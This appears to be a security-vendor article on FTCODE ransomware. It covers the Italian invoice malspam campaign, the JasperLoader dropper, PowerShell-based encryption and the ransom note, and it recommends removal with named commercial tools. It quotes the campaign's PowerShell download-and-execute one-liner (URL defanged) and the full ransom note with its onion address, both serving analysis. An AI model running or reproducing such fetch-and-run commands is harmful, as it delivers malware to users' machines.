FTCODE ransomware is an evasive file locking malware that targets mostly Italian users with fake electronic invoice attachments

FTCODE ransomware is a successor to an old crypto-malware PowerShell Locker, which initially surfaced back in March 2013[1] This variant was first spotted at the end of September 2019, when security researchers saw an active malspam[2] campaign that leveraged malicious MS Word attachment “Fattura-2019-951692.doc” – the phishing emails were primarily sent to Italian users. The attachment first downloads JasperLoader Trojan, which is later used to deliver the final payload of the FTCODE virus.[3]
Once inside the system, FTCODE ransomware makes several changes to the way Windows operates and then starts looking for files to encrypt. Once found, victims' pictures, music, video, image, and other files get encrypted with the help of a combination of AES-256 and RSA-1024-based ciphers – this process also appends .FTCODE marker to these files, effectively locking them. FTCode virus also drops a typical ransom note READ_ME_NOW.htm, which prompts users to download Tor and visit the provided website, also demanding 0.06 Bitcoin ($500) ransom for the decryption tool.
| Name | FTCODE ransomware |
| Also known as | PowerShell Locker 2019 ransomware |
| Type | File locking virus, cryptovirus |
| Stems from | The strain is closely related to the 2013 malware family PowerShell Locker, which did not see much success upon its initial release |
| File extension appended | FTCODE looks for the most-common file types and then appends .FTCODE market at the end of each |
| Distribution methods | Mainly spreads with the help of malicious email attachments that include a fake “Fattura-2019-951692.doc” invoice. The payload is executed with the help of a backdoor JasperLoader |
| Associated payloads | Cybercriminals behind the malware first used GootKit banking Trojan for monetization |
| Ransom note | The infected victims can read more details about the attack inside a ransom note READ_ME_NOW.htm which directs them to a Tor site |
| Ransom size | Crooks ask for $500 (0.06 BTC), which increases to $2,500, $5,000 and $25,000. After 30 days the key that can unlock all the encrypted data us deleted (according to malware authors) |
| Decryption | Currently only available via backups or third-party software |
| AV Detection |
|
| Termination | To remove the malware, you will have to employ anti-virus software that can recognize the payload of FTCODE – we suggest using FortectIntego |
What is unique about FTCODE ransomware is that it is fully written in PowerShell programming language, and it stores certain components in memory only – this helps the malware to avoid security software detection. Despite that, several AV engines recognize and detect malicious payloads. Thus, the first step to recovery is FTCODE ransomware removal with the help of an anti-malware program such as FortectIntego or SpyHunterCombo Cleaner.
Security researchers from Certego who analyzed two malware samples reported that there are several mistakes made within malware's code, prompting them to believe that FTCODE ransomware is still at its development stages.
PowerShell Locker ransomware was first distributed in 2013 when most of the users were still relying on Windows XP. Because the malware was fully written in PowerShell, it needed the software installed on the system in order to start the infection process. However, since Windows 7, PowerShell is now installed as one of the components by default, which would explain why crooks decided to turn their eyes towards ransomware once again.
Another interesting fact is that back in 2013, classic banking Trojans like Zeus were much more effective than ransomware due to security software not being as sophisticated as it is today. Nevertheless, due to FTCODE's ability to hide components inside the memory, its detection rate is relatively low.[4]

FTCODE ransomware is actively spread through malspam campaigns
According to Certego researchers, malicious actors behind FTCODE ransomware started their malspam campaigns by delivering Gootkit banking Trojan as the final payload, also incorporating dropper JasperLoader to send out any relative upgrades to the existing malware on the host machine. Because of this functionality, the infected users should immediately remove FTCODE ransomware along with all the secondary payloads that may be injected during malware's operation.
However, because Gootkit is a relatively old malware and requires specific user interaction in order to work properly, cybercriminals decided to dedicate their time to FTCODE ransomware development and distribution instead. As previously mentioned, PowerShell is not a mandatory component on all Windows systems, so it makes it easier for the attackers to infect host computers.
Security experts saw a few campaigns that were using Italian mail service PEC to deliver invoices, application forms, and other fake documents to potential victims. If opened, the malicious file prompts users to enable content to disable the protected view – a common social engineering trick used by malware authors. Consequently, this allows a malicious macro to run, which initiates the process that downloads PowerShell code:
powershell iex ((New-Object Net.WebClient).DownloadString('hxxp://home.southerntransitions[.]net/?need=9f5b9ee&vid=dpec2&81038'));
Upon execution, VBScript file WindowsIndexingService.vbs is downloaded and placed into C:\Users\Public\Libraries\ directory – it is later used to download and execute the payload of FTCODE ransomware.

System changes and file encryption process
Before performing file encryption, FTCODE ransomware first performs a check which verifies whether the machine has been attacked by malware previously. It does so by checking if the w00log03.tmp file exists on the system (located in C:\Users\Public\OracleKit) and also looking for files with the .FTCODE extension. According to Certego researchers, this feature can be effectively used to create a vaccine that prevents users from getting infected with FTCODE ransomware in the first place. If the criteria are met, ransomware proceeds with further infection process.
FTCODE ransomware creates a globally unique identifier (GUID)[5] along with a unique 50-character password that is encrypted with the RSA[6] public key. The private key (that is needed for data deciphering process) is sent to a command and control server that is controlled by cybercriminals. Security researchers note that this process is not thought-through, as the key could potentially be recovered:
Surprisingly, the encrypted password, after being generated, is never used elsewhere in the code and, instead, is just sent the basic base64-encoded password to the attacker’s server.
The consequence is that, if the traffic against the attacker’s server is being monitored, it’s possible to retrieve the key that will be used to decipher the files, without paying any ransom.
We believe that this mistake will be corrected in future versions.
Additionally, FTCODE virus also performs other changes that are typical to ransomware, including:
- Deletes Shadow Volume Copies
- Disables Windows recovery and repair functions
- Modifies Windows Registry
- Creates a WindowsApplicationService scheduled task
- Executes Shell commands, etc.
After the infection stage is complete, ransomware will encrypt personal files and append .ftcode extension to each of them. This way, victims can no longer use the data. Malware then drops a ransom note READ_ME_NOW.htm into each of the affected folders, which asks for $500 ransom for the decryptor:
All your files was encrypted!
Your personal ID:
Your personal KEY:
- Download Tor browser – hxxps://www.torproject.org/download/
- Install Tor browser
- Open Tor Browser
- Open link in TOR browser: hxxp://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=a1ba97b1-8713-427c-828a-b056ae7fe9b8
- Follow the instructions on this page
***** Warning*****
Do not rename filesDo not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to – make copies of all files so that we can help you if third-party software harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files – encryption key is created on your computer when the program is launched – it is unique.
On the designation Tor site, hackers indicate that the ransom size increases as time passes. The price of $500 is only available if contact is made within the first 72 hours after the infection. Further ransom demands drastically increase: $2,500, $5,000 and $25,000. According to FTCODE virus developers, the key is deleted if the victim fails to pay the ransom within 30 days.

Nevertheless, infected users should not contact hackers, as it will only fuel their enthusiasm for creating more malware and infecting more users. Besides, it is not clear whether the decryption tool would work in the first place, so losing money along the encrypted files is a real possibility.
Thus, if you are affected by this malware, remove FTCODE ransomware from your computer and use alternative solutions to decrypt your files.
Before you attempt file recovery, make sure that FTCODE ransomware along all the secondary payloads is eliminated
FTCODE virus uses sophisticated evasion and multi-stage infection techniques. For that reason, it might be difficult for some anti-virus applications to locate and remove FTCODE ransomware. However, there are still quite dozens of anti-malware tools that detect the malware as follows:
- SNH:Script [Dropper]
- Trojan.MSOffice.SLoad.a!c
- VBA/Dldr.Agent.eakuk
- HEUR:Trojan-Downloader.MSOffice.SLoad.ge
- DOC.Z.Agent.3145729.A
- Downloader.Agent!8.B23 (TOPIS:E0:TpDOfeMct
- BehavesLike.Downloader.wx, etc.
Thus, pick one of the applications and perform a full system scan – we recommend choosing FortectIntego or SpyHunterCombo Cleaner. However, be aware that FTCODE ransomware removal might be hindered by its functionality – it might prevent its successful elimination. In such a case, access Safe Mode with Networking and perform a full system scan from there.
After that, you should employ alternative file recovery methods, such as using Data Recovery Pro or Windows Previous Versions feature. However, be aware that these techniques, sadly, are unlikely to be successful. If that is the case, backup all your personal files and wait for a working decryptor from security experts. You can check the following websites for updates:
Was this guide helpful?
Be the first to comment